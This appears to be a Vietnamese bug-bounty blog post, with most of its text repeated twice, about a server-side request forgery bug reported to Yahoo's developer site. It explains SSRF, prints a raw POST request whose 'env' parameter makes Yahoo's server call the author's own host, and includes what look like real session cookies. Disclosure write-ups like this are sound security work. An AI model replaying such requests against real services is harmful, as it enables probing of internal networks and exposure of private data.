SSRF ở Yahoo developer
Hi,
This bug was just done a few days ago.
1. SSRF là gì?
- SSRF là viết tắt của Server Side Request Forgery, chi tiết của nó, có thể xem qua một cách 'practically' ở https://hackerone.com/reports/115748
- Nói theo tiếng việt một cách đơn giản: SSRF cho phép ta sử dụng máy bị khai thác, gửi đi các gói tin đến các máy khác, các gói này có thể lả HTTP request bình thường, cho đến NMAP để scanning mạng nội bộ của máy bị khai thác
2. Chỗ nào để tìm kiếm SSRF
- Thông thường là những chỗ cho phép ta nhập các URL, nếu FILTER của họ không lọc các protocol khác, hoặc đơng giản là không có FILTER, thì ở nơi đó có SSRF
3. Yahoo SSRF
- Đây là bug đầu tiên về SSRF mà mình tìm được, mà cũng là bug đầu tiên mình report cho Yahoo
- URL affected là:
- Một POST request, param 'env' được đặt thành: http://118.70.xxx.xxx
=> Có request từ Yahoo
- Sau đó mình có thử vài protocol khác, không được, FILTER của họ hoạt động khá tốt
- Thay vì SimpleHTTPServer, mình dùng Apache2, và xem access.log
- Khá là thú vị, họ dùng Chrome 35, trên Mac, như vậy, từ khai thác Server, thành Clien Side Attack (Mình không có exploit của Chrome 35, trên Mac)
- Mình report. và họ thay đổi backend client type.
This bug was just done a few days ago.
1. SSRF là gì?
- SSRF là viết tắt của Server Side Request Forgery, chi tiết của nó, có thể xem qua một cách 'practically' ở https://hackerone.com/reports/115748
- Nói theo tiếng việt một cách đơn giản: SSRF cho phép ta sử dụng máy bị khai thác, gửi đi các gói tin đến các máy khác, các gói này có thể lả HTTP request bình thường, cho đến NMAP để scanning mạng nội bộ của máy bị khai thác
2. Chỗ nào để tìm kiếm SSRF
- Thông thường là những chỗ cho phép ta nhập các URL, nếu FILTER của họ không lọc các protocol khác, hoặc đơng giản là không có FILTER, thì ở nơi đó có SSRF
3. Yahoo SSRF
- Đây là bug đầu tiên về SSRF mà mình tìm được, mà cũng là bug đầu tiên mình report cho Yahoo
- URL affected là:
- Một POST request, param 'env' được đặt thành: http://118.70.xxx.xxx
- Tại địa chỉ đó, một SimpleHTTPServer của mình đang chạyPOST /xxx/xxx/xxx.php HTTP/1.1
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Cookie: B=dd5geahbjkok5&b=3&s=57; tocState=:1;gh_sess=eyJzZXNzaW9uX2lkIjoiNGUwZDI0YWE1OGQ0NzI5YzJmODUwYThiMjBjMDUwNjAiLCJyZWZlcnJhbF9jb2RlIjoiaHR0cHM6Ly9kZXZlbG9wZXIueWFob28uY29tL3lxbC8ifQ%3D%3D--edf68b027a81b17fcee1f6db933baae38aec7daa; ywadp10001266263456=657193885; PH=l=zh-Hant-TW; ypcdb=c7b07b3cf296be45f45fb5ae0e49a9fd; BX=51rfha9bjkk22&b=3&s=dp; _uvid=1825797029; SERVERID=r88|Vzpc1|Vzpc1; bcookie="v=2&36c2798e-abd0-4d02-813a-9c524c26e375"
Host: developer.yahoo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /crumb=Lmt4XIKtvWk&env=http://118.70.xxx.xxx/&format=json&q=show%20tables&_p=hs&_rand=166
=> Có request từ Yahoo
- Sau đó mình có thử vài protocol khác, không được, FILTER của họ hoạt động khá tốt
- Thay vì SimpleHTTPServer, mình dùng Apache2, và xem access.log
- Khá là thú vị, họ dùng Chrome 35, trên Mac, như vậy, từ khai thác Server, thành Clien Side Attack (Mình không có exploit của Chrome 35, trên Mac)
- Mình report. và họ thay đổi backend client type.

Comments
Post a Comment